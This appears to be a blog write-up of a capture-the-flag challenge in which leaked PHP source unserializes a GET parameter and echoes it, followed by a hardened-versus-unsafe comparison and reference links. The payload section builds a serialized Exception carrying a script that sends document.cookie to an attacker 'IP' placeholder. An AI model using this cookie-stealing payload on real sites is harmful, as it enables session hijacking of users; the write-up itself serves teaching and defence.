[BJDCTF 2nd]xss之光

.git file leak

Use GitHack to retrieve the source code

<?php
// User-controlled input is unserialized and the result is echoed directly
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

Constructing the payload with a native (built-in) class

payload

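<?php
// Exception is a built-in class; echoing the unserialized object calls its __toString(), whose output includes the message
$a = serialize(new Exception("<script>window.location.href='IP'+document.cookie</script>"));
// URL-encode the serialized string so it can be passed in the GET parameter
echo urlencode($a);
?>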
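
Why the leaked code is exploitable and how the same parameter could be handled safely, as an added example that is not part of the original post. The function names `render_unsafe` and `render_safe` and the sample inputs are assumptions constructed for illustration.

```php
<?php
// Added example, not code from the challenge or the original post.
// render_unsafe / render_safe are hypothetical names.

// Same behaviour as the leaked source: any class can be instantiated, and
// converting the object to a string calls its __toString() unescaped.
function render_unsafe(string $input): string
{
    return (string) unserialize($input);
}

// Hardened form: no objects are instantiated, only a plain string is
// accepted, and the value is HTML-encoded before it reaches the page.
function render_safe(string $input): string
{
    // allowed_classes => false turns every serialized object into
    // __PHP_Incomplete_Class instead of a live Exception instance.
    $value = @unserialize($input, ['allowed_classes' => false]);
    if (!is_string($value)) {
        return ''; // objects, arrays, parse failures: reject
    }
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample inputs with harmless markup only.
$object_input = serialize(new Exception('<b>constructed marker</b>'));
$string_input = serialize('<b>constructed marker</b>');

// Raw markup from the Exception message survives in the unsafe output.
var_dump(strpos(render_unsafe($object_input), '<b>') !== false);

// The hardened function drops the object and encodes plain strings.
var_dump(render_safe($object_input));
var_dump(render_safe($string_input));

// For untrusted data, a format that cannot carry objects (for example
// json_decode) avoids the unserialize() attack surface entirely.
```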

References

https://blog.csdn.net/SopRomeo/article/details/105123395

https://www.cnblogs.com/iamstudy/articles/unserialize_in_php_inner_class.html#_label2

posted @ 2020-05-13 19:50  山野村夫z1